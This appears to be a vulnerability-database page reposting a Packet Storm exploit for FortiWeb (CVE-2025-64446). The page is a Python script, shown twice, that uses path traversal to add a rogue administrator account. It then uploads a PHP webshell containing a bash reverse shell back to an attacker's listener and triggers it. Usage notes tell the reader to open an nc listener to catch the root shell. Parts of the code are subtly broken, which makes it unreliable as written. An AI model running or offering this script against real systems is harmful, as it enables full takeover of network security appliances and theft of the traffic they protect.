📄 FortiWeb 8.0.1 Remote Code Execution_PACKETSTORM:218665

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

FortiWeb remote code execution exploit that affects versions prior to 7.6.7, 7.8.7, and 8.0.2...

Visit Original Source

Basic Information

ID PACKETSTORM:218665

Published Apr 10, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: FortiWeb 8.0.2 - Remote Code Execution
# Date: 2025-11-22
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.fortinet.com
# Software Link: https://www.fortinet.com/products/web-application-firewall/fortiweb
# Version: FortiWeb < 7.6.7, < 7.8.7, < 8.0.2
# Tested on: FortiWeb 7.4.2, 7.6.0, 7.6.1 (VM builds)
# CVE: CVE-2025-64446
# CVSS: 9.8 (Critical)
# Category: WebApps
# Platform: Hardware/Appliance (Linux-based)
# CRITICAL: True
# Including: Authentication Bypass + Path Traversal + Arbitrary File Upload → RCE
# Impact: Full system compromise, root reverse shell
# Fix: Upgrade to FortiWeb 7.6.7, 7.8.7, 8.0.2 or later
# Advisory: https://www.fortinet.com/support/psirt/FG-IR-25-64446
# Patch: https://support.fortinet.com
# Target: FortiWeb management interface (default port 8443)

import requests, sys, time, base64
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def banner():
print("""
CVE-2025-64446 FortiWeb RCE Exploit
Author: Mohammed Idrees Banyamer | @banyamer_security
LAB / AUTHORIZED TESTING ONLY
""")

if len(sys.argv) != 4:
banner()
print("Usage : python3 fortiweb_rce.py <target> <lhost> <lport>")
print("Example: python3 fortiweb_rce.py https://192.168.100.50:8443 192.168.45.10 4444")
print("\nSteps:")
print(" 1. Start listener → nc -lvnp 4444")
print(" 2. Run exploit → python3 fortiweb_rce.py <target> <your_ip> 4444")
print(" 3. Get root shell → enjoy\n")
sys.exit(1)

banner()
target = sys.argv[1].rstrip("/")
LHOST = sys.argv[2]
LPORT = sys.argv[3]

print(f"[*] Target : {target}")
print(f"[*] Callback : {LHOST}:{LPORT}\n")

s = requests.Session()
s.verify = False
s.headers = {"Content-Type": "application/json"}

print("[1] Creating temporary admin user...")
payload = {"../../mkey": "pwnedadmin", "password": "Pwned123!", "isadmin": "1", "status": "enable"}
r = s.post(f"{target}/api/v2.0/user/local.add", json=payload, timeout=10)
if r.status_code != 200 or "success" not in r.text:
print("[-] Failed to create admin → Target is likely patched")
return

print("[2] Logging in with new admin...")
login = s.post(f"{target}/api/v2.0/login", json={"username":"pwnedadmin","password":"Pwned123!"}, timeout=10)
if "success" not in login.text:
print("[-] Login failed")
return

shell = f'<?php system("bash -c \'bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1\'"); ?>'
b64shell = base64.b64encode(shell.encode()).decode() + "AAA=="

print("[3] Uploading webshell via backup function...")
files = {'upload-file': ('pwned.dat', b64shell, 'application/octet-stream')}
s.post(f"{target}/api/v2.0/system/maintenance/backup", files=files, timeout=15)

print(f"[4] Triggering reverse shell to {LHOST}:{LPORT} ...")
s.get(f"{target}/pwned.dat", timeout=10)

time.sleep(8)
print("[5] Cleaning up temporary admin account...")
s.post(f"{target}/api/v2.0/user/local.delete", json={"../../mkey":"pwnedadmin"})

print("\n[+] Exploit completed – check your listener for root shell!")

{
    "lastseen": "2026-04-10T17:15:45",
    "description": "FortiWeb remote code execution exploit that affects versions prior to 7.6.7, 7.8.7, and 8.0.2...",
    "published": "2026-04-10T00:00:00",
    "modified": "2026-04-10T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 FortiWeb 8.0.1 Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:218665",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-64446"
    ],
    "sourceData": "# Exploit Title: FortiWeb  8.0.2 - Remote Code Execution\n    # Date: 2025-11-22\n    # Author: Mohammed Idrees Banyamer\n    # Author Country: Jordan\n    # Instagram: @banyamer_security\n    # GitHub: https://github.com/mbanyamer\n    # Vendor Homepage: https://www.fortinet.com\n    # Software Link: https://www.fortinet.com/products/web-application-firewall/fortiweb\n    # Version: FortiWeb < 7.6.7, < 7.8.7, < 8.0.2\n    # Tested on: FortiWeb 7.4.2, 7.6.0, 7.6.1 (VM builds)\n    # CVE: CVE-2025-64446\n    # CVSS: 9.8 (Critical)\n    # Category: WebApps\n    # Platform: Hardware/Appliance (Linux-based)\n    # CRITICAL: True\n    # Including: Authentication Bypass + Path Traversal + Arbitrary File Upload \u2192 RCE\n    # Impact: Full system compromise, root reverse shell\n    # Fix: Upgrade to FortiWeb 7.6.7, 7.8.7, 8.0.2 or later\n    # Advisory: https://www.fortinet.com/support/psirt/FG-IR-25-64446\n    # Patch: https://support.fortinet.com\n    # Target: FortiWeb management interface (default port 8443)\n    \n    import requests, sys, time, base64\n    from urllib3.exceptions import InsecureRequestWarning\n    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n    \n    def banner():\n        print(\"\"\"\n        CVE-2025-64446 FortiWeb RCE Exploit\n        Author: Mohammed Idrees Banyamer | @banyamer_security\n        LAB / AUTHORIZED TESTING ONLY\n        \"\"\")\n    \n    if len(sys.argv) != 4:\n        banner()\n        print(\"Usage  : python3 fortiweb_rce.py <target> <lhost> <lport>\")\n        print(\"Example: python3 fortiweb_rce.py https://192.168.100.50:8443 192.168.45.10 4444\")\n        print(\"\\nSteps:\")\n        print(\"  1. Start listener   \u2192 nc -lvnp 4444\")\n        print(\"  2. Run exploit      \u2192 python3 fortiweb_rce.py <target> <your_ip> 4444\")\n        print(\"  3. Get root shell   \u2192 enjoy\\n\")\n        sys.exit(1)\n    \n    banner()\n    target = sys.argv[1].rstrip(\"/\")\n    LHOST  = sys.argv[2]\n    LPORT  = sys.argv[3]\n    \n    print(f\"[*] Target : {target}\")\n    print(f\"[*] Callback : {LHOST}:{LPORT}\\n\")\n    \n    s = requests.Session()\n    s.verify = False\n    s.headers = {\"Content-Type\": \"application/json\"}\n    \n    print(\"[1] Creating temporary admin user...\")\n    payload = {\"../../mkey\": \"pwnedadmin\", \"password\": \"Pwned123!\", \"isadmin\": \"1\", \"status\": \"enable\"}\n    r = s.post(f\"{target}/api/v2.0/user/local.add\", json=payload, timeout=10)\n    if r.status_code != 200 or \"success\" not in r.text:\n        print(\"[-] Failed to create admin \u2192 Target is likely patched\")\n        return\n    \n    print(\"[2] Logging in with new admin...\")\n    login = s.post(f\"{target}/api/v2.0/login\", json={\"username\":\"pwnedadmin\",\"password\":\"Pwned123!\"}, timeout=10)\n    if \"success\" not in login.text:\n        print(\"[-] Login failed\")\n        return\n    \n    shell = f'<?php system(\"bash -c \\'bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1\\'\"); ?>'\n    b64shell = base64.b64encode(shell.encode()).decode() + \"AAA==\"\n    \n    print(\"[3] Uploading webshell via backup function...\")\n    files = {'upload-file': ('pwned.dat', b64shell, 'application/octet-stream')}\n    s.post(f\"{target}/api/v2.0/system/maintenance/backup\", files=files, timeout=15)\n    \n    print(f\"[4] Triggering reverse shell to {LHOST}:{LPORT} ...\")\n    s.get(f\"{target}/pwned.dat\", timeout=10)\n    \n    time.sleep(8)\n    print(\"[5] Cleaning up temporary admin account...\")\n    s.post(f\"{target}/api/v2.0/user/local.delete\", json={\"../../mkey\":\"pwnedadmin\"})\n    \n    print(\"\\n[+] Exploit completed \u2013 check your listener for root shell!\")",
    "sourceHref": "https://packetstorm.news/download/218665",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/218665/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply